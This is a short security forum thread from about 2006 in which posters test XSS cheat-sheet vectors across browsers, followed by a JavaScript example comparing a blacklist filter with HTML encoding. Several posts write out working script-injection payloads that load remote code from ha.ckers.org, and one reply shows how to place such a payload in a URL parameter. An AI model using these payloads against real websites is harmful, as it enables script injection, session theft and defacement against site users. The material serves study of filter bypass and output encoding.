Sla.ckers.org
xss cheat sheet browsers
Posted by: maluc
Date: September 17, 2006 09:32AM

i'm testing them for use in browser detecting and came across one that was untested for opera. -i'll include more if i find them

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> that vector works for opera8.54 (and 9) .. interestingly though, i think ie7 may not allow external alerts, although it didn't still insert the remote text.

if you'd like to extend the cheat sheet's legend for ie7 and opera9 .. i'll be testing about half of them and recording the results.

-maluc

Re: xss cheat sheet browsers
Posted by: maluc
Date: September 17, 2006 09:44AM

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> works in all browsers tested .. although it seriously fucks up the html for the rest of the page, in all browsers

until it reaches a </script> anyway

Edit: the same goes for the vector: <SCRIPT SRC=//ha.ckers.org/.j> .. renders in all browsers but messes up the html that follows.. and works correctly in all browsers with a </script> added

-maluc



Edited 1 time(s). Last edit at 09/17/2006 09:49AM by maluc.

Re: xss cheat sheet browsers
Posted by: rsnake
Date: September 17, 2006 01:04PM

I'm a little hesitant to add IE7.0 until it gets out of beta, although I have done quite a bit of testing myself... It appears that the javascript: directive inside images will be the biggest change between IE7.0 and IE6.0.

But yes, point taken, I need to re-test all the modern browsers. Anyone have BeEF with all the browsers?

- RSnake
Gotta love it. http://ha.ckers.org

Re: xss cheat sheet browsers
Posted by: j-hc
Date: January 18, 2007 05:36AM

i don't mean to sound stupid, but what do i insert these codes into?? like blogs? profiles? or what?

Re: xss cheat sheet browsers
Posted by: rsnake
Date: January 19, 2007 04:28PM

Those places, yes... but most often it's in URL parameters:

h ttp://whatever.com/function.php?variable1=stuff&variable2=stuff

You would insert it where you saw the "stuff" so it might look like:

h ttp://whatever.com/function.php?variable1=<script>alert("XSS")</script>&variable2=stuff

There are lots of other places, but that should give you an idea.

- RSnake
Gotta love it. http://ha.ckers.org
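
Added example (not part of any post in this thread): the vectors quoted above, passed through a blacklist-style filter and through HTML output encoding when variable1 is reflected into a page. The handler, function names and page template are assumptions made for illustration.

```javascript
// Constructed sample input: the vectors quoted in the posts above.
const VECTORS = [
  '<script>alert("XSS")</script>',
  '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
  '<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>',
  '<SCRIPT SRC=//ha.ckers.org/.j>',
];

// Weak setting: blacklist that strips only the literal <script>...</script> form.
function naiveFilter(value) {
  return value.replace(/<script>[\s\S]*?<\/script>/gi, '');
}

// Hardened setting: encode every HTML-significant character.
// Suitable for element content and quoted attribute values only.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical server-side reflection of variable1 into the response body.
function render(queryString, sanitize) {
  const params = new URLSearchParams(queryString);
  const v = params.get('variable1') ?? '';
  return `<p>You searched for: ${sanitize(v)}</p>`;
}

// Check used for this demo only: does the markup still open a script tag?
function hasScriptTag(html) {
  return /<script[\s/>]/i.test(html);
}

// Render each vector both ways and record whether a script tag survives.
function survey() {
  return VECTORS.map((v) => {
    const qs = 'variable1=' + encodeURIComponent(v) + '&variable2=stuff';
    return {
      vector: v,
      naive: hasScriptTag(render(qs, naiveFilter)),
      escaped: hasScriptTag(render(qs, escapeHtml)),
    };
  });
}

console.table(survey());
```

The filter removes only the literal `<script>` form; the attribute-bearing and unclosed variants pass through it unchanged, while the encoded output contains no tag opener for any of them.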
